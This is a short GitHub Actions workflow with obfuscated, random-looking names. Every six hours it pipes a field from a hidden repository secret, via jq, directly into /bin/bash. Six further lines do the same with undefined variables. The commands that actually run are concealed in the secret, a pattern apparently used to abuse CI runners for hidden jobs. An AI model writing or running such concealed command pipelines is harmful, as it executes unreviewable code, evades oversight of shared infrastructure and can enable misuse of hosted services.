name: lindaiyan4635

on:
  workflow_dispatch:
  schedule:
    - cron: '33 0/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: lindaiyan4635
        env:
          q1: ${{ secrets.q1 }}
        run: |
          echo $q1 | jq -r .chqj13850 | /bin/bash
          echo $ubgm60 | jq -r .kpne5727 | /bin/bash
          echo $qtu39 | jq -r .ma33446 | /bin/bash
          echo $xv5 | jq -r .t68458 | /bin/bash
          echo $c8422 | jq -r .kp32 | /bin/bash
          echo $pm4 | jq -r .kz2554 | /bin/bash
          echo $uwfr00538 | jq -r .ks07731 | /bin/bash

